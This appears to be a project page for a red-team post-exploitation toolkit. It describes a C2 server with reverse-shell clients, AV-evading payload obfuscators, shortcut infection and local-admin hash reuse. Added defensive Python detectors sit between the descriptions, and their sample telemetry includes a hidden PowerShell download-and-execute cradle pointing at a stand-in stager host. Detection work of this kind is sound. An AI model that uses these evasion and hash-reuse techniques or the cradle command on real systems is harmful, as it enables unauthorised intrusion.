fathomless: post-exploitation tools for network red teaming

fathomless

A collection of tools tailored for red teams but also useful for pen testers.

  • Modified Linux distro that is effective on Windows 7 partitions and pre-UEFI systems.
  • Custom HTTPS-capable C2 server that uses a CGI written in Perl and reverse-shell clients written in PowerShell / Python.
  • Simple Windows script obfuscator for AV evasion that uses a polyalphabetic cipher to alter the base64 encoding.

IAC2

This is an upgrade of sorts to the async-shell-handler.

async-shell-handler

asynchronous multi-shell handler

Includes a server-side CGI application and a PowerShell client. It handles systems that have executed the async-client script, allowing the operator of the server hosting the CGI to enter shell commands that the clients execute asynchronously.

The information is exchanged in an encoded format; the encoding itself provides no confidentiality, so the security of the exchange relies entirely on the use of SSL/TLS.

gen-obfuscated

Generate Obfuscated Code

This is a simple Perl program that generates obfuscated VBS/VBA code for passing a command to cmd /c while bypassing AV.

To set the options you will need to edit the .pl file directly; this is not a simple program with preset payloads. It is designed to take any type of one-liner you can think of passing to "cmd.exe /c".

Made to be used along with the async-client PowerShell script, but any one-liner that gets you a shell should work.

Generated output of an obfuscated command string:

[image: generated output]

The hash value of the resulting code for the same command string changes on every run.

[image: generated hash]

PSobfuscator

The result of porting some functionality from gen-obfuscated into the PowerShell clients. These are those functions, plus some original content, in a stand-alone version that runs from a Windows system to generate initial-access payloads without needing the PowerShell clients/implants.

The obfuscation engine is ported, but the only output formats currently supported are VBScript, VBA macros and LNK files, along with other obfuscation techniques.

This is not complete; the under-utilized functions will be expanded upon, or you can do your own thing and not have to wait.

Available functions:

simple-downloader "Url-hosting-script"

Generates an obfuscated VBS script that downloads and executes a PowerShell script. After execution it rewrites itself into a .txt file with bogus content and opens that file in Notepad.

looping-stager "Url-hosting-script"

Generates a command string that kicks off a looping downloader.

gen-shorcut "Url-hosting-script"

Creates a shortcut that downloads and executes the script found at the provided URL.

shortcut-infect "name-of-lnk" "Url-hosting-script"

Modifies the specified existing shortcut so that it still runs the original program and additionally executes a download-and-execute command string.
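On the receiving end, the four payload types above (VBS downloader, looping stager, generated shortcut, infected shortcut) all leave the same footprint on a host: a script host or explorer.exe launching a shell whose command line carries a download-and-execute cradle or an encoded/hidden launch. The following is an added detection example, not code from the fathomless project; the event field names (parent_image, image, command_line) and the sample events are constructed stand-ins for real process-creation telemetry, and the URL uses the reserved .invalid domain.

```python
"""Flag script-host and shortcut-launched PowerShell download cradles.

Added example; not part of the fathomless project. The record layout and
the sample events below are constructed, not a real telemetry schema.
"""
import re

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}

# Tokens typical of a download-and-execute one-liner or a hidden/encoded launch.
CRADLE_PATTERNS = [
    r"downloadstring", r"downloadfile", r"invoke-webrequest", r"\biwr\b",
    r"net\.webclient", r"invoke-expression", r"\biex\b",
    r"-(?:e|ec|enc|encodedcommand)\b", r"-w(?:indowstyle)?\s+hidden",
    r"bitsadmin", r"certutil\S*\s+-urlcache",
]
CRADLE_RE = re.compile("|".join(CRADLE_PATTERNS), re.IGNORECASE)


def basename(path):
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(event):
    """Return the reasons an event looks like a cradle launch ([] if none)."""
    parent = basename(event.get("parent_image", ""))
    image = basename(event.get("image", ""))
    cmdline = event.get("command_line", "")
    tokens = sorted({m.group(0).lower() for m in CRADLE_RE.finditer(cmdline)})
    reasons = []
    if image not in SHELLS:
        return reasons
    if parent in SCRIPT_HOSTS:
        # wscript/cscript spawning a shell is the VBS downloader's lineage.
        reasons.append(f"script host {parent} spawned {image}")
    elif parent == "explorer.exe" and tokens:
        # A double-clicked .lnk runs its target as a child of explorer.exe.
        reasons.append(f"explorer.exe (shortcut or user launch) spawned {image}")
    if tokens and (reasons or len(tokens) >= 2):
        reasons.append("cradle tokens: " + ", ".join(tokens))
    return reasons


def scan(events):
    """Return (index, reasons) for every event that classify() flags."""
    flagged = []
    for idx, event in enumerate(events):
        reasons = classify(event)
        if reasons:
            flagged.append((idx, reasons))
    return flagged


SAMPLE_EVENTS = [  # constructed sample telemetry, not real logs
    {"parent_image": r"C:\Windows\System32\wscript.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe -w hidden -nop -c \"IEX (New-Object Net.WebClient)"
                     ".DownloadString('http://stager.example.invalid/s.ps1')\""},
    {"parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "command_line": "cmd.exe /c start notepad.exe & powershell -enc SQBFAFgA"},
    {"parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe"},
    {"parent_image": r"C:\Windows\System32\services.exe",
     "image": r"C:\Windows\System32\svchost.exe",
     "command_line": "svchost.exe -k netsvcs"},
]

if __name__ == "__main__":
    for idx, reasons in scan(SAMPLE_EVENTS):
        print(f"event {idx}: " + "; ".join(reasons))
```

The second sample event is the infected-shortcut shape (the original program still starts, then a shell runs an encoded command); the third, a plain PowerShell launched from explorer with no cradle tokens, stays unflagged so that ordinary interactive use does not alert.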

obfuscate "name of text file / script"

Applies a polyalphabetic obfuscation method to base64 strings, writes the obfuscated string to a file and provides a de-obfuscation key.

de-obfuscate "name of text file / script" "key"

Performs the inverse of the obfuscate function; requires the text file containing the obfuscated base64 data and the de-obfuscation key as parameters.

gen-key

Generates a random alphabetic string for use as the key with the obfuscate-base64 function.

obfuscate-base64 "(action: hide or clear), (key: obfuscation or de-obfuscation), (base64-string)"

The function that contains the obfuscation engine; it works only with clear base64 data. It expects UTF-8, so do not use it on PowerShell encoded commands.

byte-encode "binary-to-obfuscate" "key"

Performs byte-encoding before converting to obfuscated base64; the given key is needed for de-obfuscation.

byte-decode "file-containing-obfu-base64" "key"

Performs the reverse of byte-encode; requires the de-obfuscation key.

gen-enccmd "your command string"

Generates a PowerShell-formatted encoded command. Ensure that you quote your command string.

example: gen-enccmd "cmd /c ipconfig /all"

dec-enccmd "Your encoded command string"

Decodes the base64 string and displays the original command.

IMPORTANT!!! Be sure to dot-source this script (or use iex) to import these functions into your current PowerShell session for this to work.
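The reason obfuscate-base64 must not be pointed at a PowerShell encoded command, and what gen-enccmd / dec-enccmd do, comes down to one detail: powershell.exe -EncodedCommand takes base64 of the UTF-16LE bytes of the script text, not of its UTF-8 bytes. The following is an added example (not PSobfuscator's own code) that encodes and decodes in the form PowerShell expects, tells the two encodings apart, and pulls an encoded command out of a process command line the way an analyst would when triaging the telemetry; the sample command line is constructed and the function names are this example's own.

```python
"""Encode, decode and recognise PowerShell -EncodedCommand strings.

Added example; not part of PSobfuscator. gen_enccmd/dec_enccmd mirror what
gen-enccmd and dec-enccmd are described as doing; everything else is an
analyst-side helper written for this example.
"""
import base64
import re

# powershell.exe accepts several spellings of the encoded-command switch.
ENC_ARG_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)",
                        re.IGNORECASE)


def gen_enccmd(command):
    """Base64 over UTF-16LE, the form powershell.exe -EncodedCommand expects."""
    return base64.b64encode(command.encode("utf-16-le")).decode("ascii")


def b64_utf8(text):
    """What a UTF-8 base64 tool (such as obfuscate-base64) works with instead."""
    return base64.b64encode(text.encode("utf-8")).decode("ascii")


def dec_enccmd(encoded):
    """Reverse of gen_enccmd; rejects blobs that cannot be UTF-16LE at all."""
    raw = base64.b64decode(encoded, validate=True)
    if len(raw) % 2:
        raise ValueError("odd byte count: not UTF-16LE (UTF-8 blob?)")
    return raw.decode("utf-16-le")


def sniff_encoding(encoded):
    """Heuristic for ASCII-range text: UTF-16LE has a zero high byte in every
    code unit, UTF-8 never does. Returns 'utf-16-le', 'utf-8' or 'binary'."""
    raw = base64.b64decode(encoded, validate=True)
    if (raw and len(raw) % 2 == 0
            and all(raw[i] == 0 for i in range(1, len(raw), 2))
            and all(raw[i] != 0 for i in range(0, len(raw), 2))):
        return "utf-16-le"
    try:
        raw.decode("utf-8")
        return "utf-8"
    except UnicodeDecodeError:
        return "binary"


def extract_encoded_command(cmdline):
    """Pull the -enc blob out of a process command line and decode it.
    Returns None when the command line carries no encoded command."""
    match = ENC_ARG_RE.search(cmdline)
    if not match:
        return None
    return dec_enccmd(match.group(1))


if __name__ == "__main__":
    cmd = "cmd /c ipconfig /all"
    enc = gen_enccmd(cmd)
    print("encoded:", enc)
    print("decoded:", dec_enccmd(enc))
    # Feeding a UTF-8 blob to the UTF-16LE decoder does not fail, it just
    # yields nonsense; that silent mismatch is what the UTF-8 warning is about.
    print("utf-8 blob read as utf-16le:", repr(dec_enccmd(b64_utf8(cmd))))
    print("sniffed:", sniff_encoding(enc), "/", sniff_encoding(b64_utf8(cmd)))
    # constructed command line, as it would appear in process-creation telemetry
    print(extract_encoded_command("powershell -w hidden -enc SQBFAFgA"))
```

Note that the mismatch in the other direction is silent: an even-length UTF-8 blob decodes "successfully" as UTF-16LE into meaningless characters, so when decoding strings from logs it pays to check which encoding you are looking at rather than trusting the first decode that does not raise.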

The boot2own toolkit

B2O is a toolkit that generates a live OS from a CrunchBang ISO. When a workstation is booted into this live environment, its hard drive is mounted and the NTLM hash of the local administrator (RID 500) is extracted. The admin hash is then leveraged in attacks against a Windows domain network using a patched winexe binary.

Used crunchbang-11-20130506-i686.iso successfully to generate the live CD.

Used Ubuntu Server x86 12.04 successfully to compile the patched winexe, so use Ubuntu Server/Desktop x86 12.04 to compile the binary for the i686 CrunchBang ISO.

Confirmed working on Windows 7 only.
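The second half of that workflow, the extracted RID 500 hash being reused across the domain through winexe, is visible in ordinary Windows logon telemetry. The following is an added detection example, not part of boot2own; it assumes that winexe-style remote execution shows up on each target as an NTLM network logon (Windows event 4624, logon type 3) by the built-in Administrator, and looks for one source address fanning that account out to several hosts in a short window. The record layout and the logon records are constructed simplifications of the real event fields.

```python
"""Spot a shared local-admin hash being replayed across a domain.

Added example; not part of boot2own. The tuple layout below is a constructed
stand-in for the fields of a Windows 4624 event.
"""
from collections import defaultdict
from datetime import datetime, timedelta

FIELDS = ("time", "computer", "target_user", "target_sid",
          "logon_type", "auth_package", "source_ip")


def parse(record):
    """Turn one constructed tuple into a dict with a real datetime."""
    row = dict(zip(FIELDS, record))
    row["time"] = datetime.fromisoformat(row["time"])
    return row


def is_rid500_ntlm_network(row):
    """Network (type 3) NTLM logon by a machine's built-in Administrator.
    Every local Administrator SID ends in -500 regardless of the machine."""
    return (row["logon_type"] == 3
            and row["auth_package"].upper() == "NTLM"
            and row["target_sid"].endswith("-500"))


def find_fanout(records, threshold=3, window=timedelta(minutes=10)):
    """One alert per source address that reaches `threshold` distinct hosts
    as RID 500 over NTLM inside `window`; legitimate admin work with a
    domain account over Kerberos never matches."""
    by_source = defaultdict(list)
    for row in map(parse, records):
        if is_rid500_ntlm_network(row):
            by_source[row["source_ip"]].append(row)
    alerts = []
    for src, rows in by_source.items():
        rows.sort(key=lambda r: r["time"])
        for i, start in enumerate(rows):
            hosts = {r["computer"] for r in rows[i:]
                     if r["time"] - start["time"] <= window}
            if len(hosts) >= threshold:
                alerts.append({"source_ip": src, "hosts": sorted(hosts),
                               "first": start["time"].isoformat()})
                break
    return alerts


SAMPLE_LOGONS = [  # constructed, not real event data
    # time, computer, target_user, target_sid, logon_type, auth_package, source_ip
    ("2024-01-10T09:00:01", "WS01", "Administrator", "S-1-5-21-1001-2001-3001-500", 3, "NTLM", "10.0.5.23"),
    ("2024-01-10T09:00:40", "WS02", "Administrator", "S-1-5-21-1002-2002-3002-500", 3, "NTLM", "10.0.5.23"),
    ("2024-01-10T09:01:15", "WS03", "Administrator", "S-1-5-21-1003-2003-3003-500", 3, "NTLM", "10.0.5.23"),
    ("2024-01-10T09:03:02", "FS01", "Administrator", "S-1-5-21-1004-2004-3004-500", 3, "NTLM", "10.0.5.23"),
    ("2024-01-10T09:05:00", "WS01", "jdoe", "S-1-5-21-9-9-9-1105", 3, "Kerberos", "10.0.7.40"),
    ("2024-01-10T09:05:30", "WS02", "jdoe", "S-1-5-21-9-9-9-1105", 3, "Kerberos", "10.0.7.40"),
    ("2024-01-10T09:05:50", "WS03", "jdoe", "S-1-5-21-9-9-9-1105", 3, "Kerberos", "10.0.7.40"),
    ("2024-01-10T09:10:00", "WS05", "Administrator", "S-1-5-21-1005-2005-3005-500", 2, "Negotiate", "-"),
    ("2024-01-10T09:12:00", "FS02", "Administrator", "S-1-5-21-1006-2006-3006-500", 3, "NTLM", "10.0.9.9"),
]

if __name__ == "__main__":
    for alert in find_fanout(SAMPLE_LOGONS):
        print(f"{alert['source_ip']} reached {len(alert['hosts'])} hosts as RID 500 "
              f"from {alert['first']}: {', '.join(alert['hosts'])}")
```

The heuristic depends on exactly the two conditions the toolkit depends on: an extractable hash (an unencrypted disk) and a hash that works on more than one machine (the same local administrator password everywhere). Unique per-host local admin passwords and full-disk encryption take both away, and the detection above catches what is left when they are not in place.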

Download & Usage

Source: https://github.com/xor-function/
